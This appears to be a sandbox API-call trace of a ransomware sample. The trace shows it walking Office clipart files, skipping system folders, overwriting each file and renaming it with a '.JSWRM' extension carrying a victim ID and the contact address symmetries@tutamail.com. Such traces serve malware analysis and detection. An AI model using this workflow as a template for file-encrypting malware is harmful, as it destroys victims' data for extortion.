[0079.910] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x4a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x4a0, lpOverlapped=0x0) returned 1 [0079.911] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.911] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x4a0, lpOverlapped=0x0) returned 1 [0079.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0079.911] CloseHandle (hObject=0x314) returned 1 [0079.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0079.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0079.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0079.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0079.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0079.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0079.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.912] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099181.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099181.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099181.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099181.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0079.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0079.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0079.913] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe0a7b88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe0a7b88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe0a7b88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf00, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099182.WMF", cAlternateFileName="")) returned 1 [0079.913] lstrcmpiW (lpString1="J0099182.WMF", lpString2=".") returned 1 [0079.913] lstrcmpiW (lpString1="J0099182.WMF", lpString2="..") returned 1 [0079.913] lstrcmpiW (lpString1="J0099182.WMF", lpString2="...") returned 1 [0079.913] lstrcmpiW (lpString1="J0099182.WMF", lpString2="windows") returned -1 [0079.913] lstrcmpiW (lpString1="J0099182.WMF", lpString2="recovery") returned -1 [0079.913] lstrcmpiW (lpString1="J0099182.WMF", lpString2="perflogs") returned -1 [0079.913] lstrcmpiW (lpString1="J0099182.WMF", lpString2="documents and settings") returned 1 [0079.913] lstrcmpiW (lpString1="J0099182.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.913] lstrcmpiW (lpString1="J0099182.WMF", lpString2="system volume information") returned -1 [0079.913] lstrcmpiW (lpString1="J0099182.WMF", lpString2="msocache") returned -1 [0079.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0079.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099182.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099182.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099182.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0079.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0079.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099182.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099182.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099182.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0079.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0079.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0079.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0079.913] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099182.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099182.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.914] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3840) returned 1 [0079.914] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf00) returned 0x23fc98 [0079.914] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xf00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xf00, lpOverlapped=0x0) returned 1 [0079.916] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.916] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xf00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xf00, lpOverlapped=0x0) returned 1 [0079.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0079.916] CloseHandle (hObject=0x314) returned 1 [0079.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0079.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0079.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0079.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0079.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0079.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0079.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.916] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099182.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099182.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099182.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099182.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0079.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0079.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0079.917] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe0a7b88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe0a7b88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe0a7b88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1352, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099183.WMF", cAlternateFileName="")) returned 1 [0079.917] lstrcmpiW (lpString1="J0099183.WMF", lpString2=".") returned 1 [0079.917] lstrcmpiW (lpString1="J0099183.WMF", lpString2="..") returned 1 [0079.917] lstrcmpiW (lpString1="J0099183.WMF", lpString2="...") returned 1 [0079.917] lstrcmpiW (lpString1="J0099183.WMF", lpString2="windows") returned -1 [0079.917] lstrcmpiW (lpString1="J0099183.WMF", lpString2="recovery") returned -1 [0079.917] lstrcmpiW (lpString1="J0099183.WMF", lpString2="perflogs") returned -1 [0079.918] lstrcmpiW (lpString1="J0099183.WMF", lpString2="documents and settings") returned 1 [0079.918] lstrcmpiW (lpString1="J0099183.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.918] lstrcmpiW (lpString1="J0099183.WMF", lpString2="system volume information") returned -1 [0079.918] lstrcmpiW (lpString1="J0099183.WMF", lpString2="msocache") returned -1 [0079.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0079.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099183.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099183.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099183.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0079.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0079.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099183.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099183.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099183.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0079.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0079.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0079.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0079.918] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099183.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099183.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.918] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4946) returned 1 [0079.918] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1350) returned 0x205850 [0079.918] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1350, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1350, lpOverlapped=0x0) returned 1 [0079.920] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.920] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1350, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1350, lpOverlapped=0x0) returned 1 [0079.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0079.920] CloseHandle (hObject=0x314) returned 1 [0079.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0079.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0079.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0079.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0079.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0079.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0079.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0079.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0079.921] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099183.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099183.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099183.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099183.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0079.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0079.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0079.922] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe0a7b88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe0a7b88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe0a7b88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1016, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099184.WMF", cAlternateFileName="")) returned 1 [0079.922] lstrcmpiW (lpString1="J0099184.WMF", lpString2=".") returned 1 [0079.922] lstrcmpiW (lpString1="J0099184.WMF", lpString2="..") returned 1 [0079.922] lstrcmpiW (lpString1="J0099184.WMF", lpString2="...") returned 1 [0079.922] lstrcmpiW (lpString1="J0099184.WMF", lpString2="windows") returned -1 [0079.922] lstrcmpiW (lpString1="J0099184.WMF", lpString2="recovery") returned -1 [0079.922] lstrcmpiW (lpString1="J0099184.WMF", lpString2="perflogs") returned -1 [0079.922] lstrcmpiW (lpString1="J0099184.WMF", lpString2="documents and settings") returned 1 [0079.922] lstrcmpiW (lpString1="J0099184.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.922] lstrcmpiW (lpString1="J0099184.WMF", lpString2="system volume information") returned -1 [0079.922] lstrcmpiW (lpString1="J0099184.WMF", lpString2="msocache") returned -1 [0079.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0079.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099184.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099184.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099184.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0079.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0079.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099184.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099184.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099184.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0079.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0079.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0079.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0079.922] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099184.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099184.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.923] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4118) returned 1 [0079.923] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1010) returned 0x23fc98 [0079.923] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x1010, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x1010, lpOverlapped=0x0) returned 1 [0079.934] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.934] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x1010, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x1010, lpOverlapped=0x0) returned 1 [0079.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0079.934] CloseHandle (hObject=0x314) returned 1 [0079.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0079.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0079.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) 